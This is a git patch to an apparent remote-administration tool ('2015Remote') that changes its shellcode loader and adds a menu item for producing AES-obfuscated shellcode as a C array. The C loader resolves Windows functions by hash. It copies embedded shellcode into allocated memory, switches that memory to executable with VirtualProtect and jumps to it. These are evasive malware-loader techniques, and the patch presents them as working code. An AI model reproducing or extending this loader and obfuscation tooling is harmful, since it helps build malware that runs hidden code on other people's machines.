From a5f068b03659d71f87441ed489e6ec1ff1a553d9 Mon Sep 17 00:00:00 2001 From: yuanyuanxiang <962914132@qq.com> Date: Thu, 20 Nov 2025 05:23:28 +0800 Subject: [PATCH] Improve: Add debug code for `SCLoader` --- client/SimpleSCLoader.c | 24 ++++++++++++++++++++---- server/2015Remote/2015Remote.rc | Bin 105466 -> 105622 bytes server/2015Remote/2015RemoteDlg.cpp | 7 +++++++ server/2015Remote/2015RemoteDlg.h | 1 + server/2015Remote/resource.h | Bin 55004 -> 55200 bytes 5 files changed, 28 insertions(+), 4 deletions(-) diff --git a/client/SimpleSCLoader.c b/client/SimpleSCLoader.c index 600befd..f792670 100644 --- a/client/SimpleSCLoader.c +++ b/client/SimpleSCLoader.c @@ -19,6 +19,9 @@ typedef HMODULE(WINAPI* _LoadLibraryA)(LPCSTR lpLibFileName); #define VirtualAlloc_Hash 0x5E893462 typedef LPVOID(WINAPI* _VirtualAlloc)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect); +#define VirtualProtect_Hash 1819198468 +typedef BOOL(WINAPI* _VirtualProtect)(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect); + #define Sleep_Hash 1065713747 typedef VOID(WINAPI* _Sleep)(DWORD dwMilliseconds); @@ -209,11 +212,21 @@ inline void* mc(void* dest, const void* src, size_t n) { // A simple shell code loader. // Copy left (c) yuanyuanxiang. #ifdef _DEBUG -int main() +// Tip: Use menu to generate TinyRun.c. +#ifdef _WIN64 +#include "../x64/Release/TinyRun.c" #else -int entry() +#include "../Release/TinyRun.c" +#endif +int main(){ + sc.len = Shellcode_len; + if (sc.len > sizeof(sc.data)) return -1; + memcpy(sc.data, Shellcode, sc.len); + memcpy(sc.aes_iv, "It is a example", 16); + memcpy(sc.aes_key, "It is a example", 16); +#else +int entry(){ #endif -{ if (!sc.data[0] || !sc.len) return -1; @@ -226,10 +239,13 @@ int entry() _GetProcAddress GetProcAddress = (_GetProcAddress)get_proc_address_from_hash(kernel32, GetProcAddress_Hash, 0); _LoadLibraryA LoadLibraryA = (_LoadLibraryA)get_proc_address_from_hash(kernel32, LoadLibraryA_Hash, GetProcAddress); _VirtualAlloc VirtualAlloc = (_VirtualAlloc)get_proc_address_from_hash(kernel32, VirtualAlloc_Hash, GetProcAddress); + _VirtualProtect VirtualProtect = (_VirtualProtect)get_proc_address_from_hash(kernel32, VirtualProtect_Hash, GetProcAddress); _Sleep Sleep = (_Sleep)get_proc_address_from_hash(kernel32, Sleep_Hash, GetProcAddress); - void* exec = VirtualAlloc(NULL, sc.len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + void* exec = VirtualAlloc(NULL, sc.len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); if (exec) { mc(exec, sc.data, sc.len); + DWORD oldProtect = 0; + if (!VirtualProtect(exec, sc.len, PAGE_EXECUTE_READ, &oldProtect)) return -3; ((void(*)())exec)(); Sleep(INFINITE); } diff --git a/server/2015Remote/2015Remote.rc b/server/2015Remote/2015Remote.rc index bc40a8a9853d2a689bd86bf3835ef0c45c2a4d26..f1bafba6f899f01a1027d588210be88dedec4b76 100644 GIT binary patch delta 57 zcmeyhoo(7qwuUW?%gm?u88d23|6sx>CG5!H$`H&D&)^KijtoIS=r}!)l~H{90S!i( K?UT$IGg1H*IuLgN delta 27 jcmbQXlkL}bwuUW?%gm>%m@sNg|6sx>wY|lHQ78ofp0Nq{ diff --git a/server/2015Remote/2015RemoteDlg.cpp b/server/2015Remote/2015RemoteDlg.cpp index 7c88cce..915bd04 100644 --- a/server/2015Remote/2015RemoteDlg.cpp +++ b/server/2015Remote/2015RemoteDlg.cpp @@ -533,6 +533,7 @@ BEGIN_MESSAGE_MAP(CMy2015RemoteDlg, CDialogEx) ON_COMMAND(ID_SHELLCODE_AES_BIN, &CMy2015RemoteDlg::OnShellcodeAesBin) ON_COMMAND(ID_SHELLCODE_TEST_AES_BIN, &CMy2015RemoteDlg::OnShellcodeTestAesBin) ON_COMMAND(ID_TOOL_RELOAD_PLUGINS, &CMy2015RemoteDlg::OnToolReloadPlugins) + ON_COMMAND(ID_SHELLCODE_AES_C_ARRAY, &CMy2015RemoteDlg::OnShellcodeAesCArray) END_MESSAGE_MAP() @@ -3336,6 +3337,12 @@ void CMy2015RemoteDlg::OnObfsShellcode() shellcode_process(&obfs); } +void CMy2015RemoteDlg::OnShellcodeAesCArray() +{ + ObfsAes obfs; + shellcode_process(&obfs); +} + void CMy2015RemoteDlg::OnToolGenShellcodeBin() { diff --git a/server/2015Remote/2015RemoteDlg.h b/server/2015Remote/2015RemoteDlg.h index fd3d27e..7018775 100644 --- a/server/2015Remote/2015RemoteDlg.h +++ b/server/2015Remote/2015RemoteDlg.h @@ -356,4 +356,5 @@ public: afx_msg void OnShellcodeAesBin(); afx_msg void OnShellcodeTestAesBin(); afx_msg void OnToolReloadPlugins(); + afx_msg void OnShellcodeAesCArray(); }; diff --git a/server/2015Remote/resource.h b/server/2015Remote/resource.h index 9df5ea236e090f9b74752155b1705c8473e0560b..058b576133d597d5639ebf649b14285857abfd3a 100644 GIT binary patch delta 82 zcmcb!mU+Q?<_#5BChss2n;dXXWOChkHb%3_foD}G|GO$N+2E{{up@&jLoh=;gEJ62 mG6VskB#|?IT$TB7hmaSoV=-9VshM7k;z)uHUR)OULOts delta 26 kcmV+#0OkLnuLInz1F(41vpm&?0h7+u7?XU~7?bkWuDg2n+a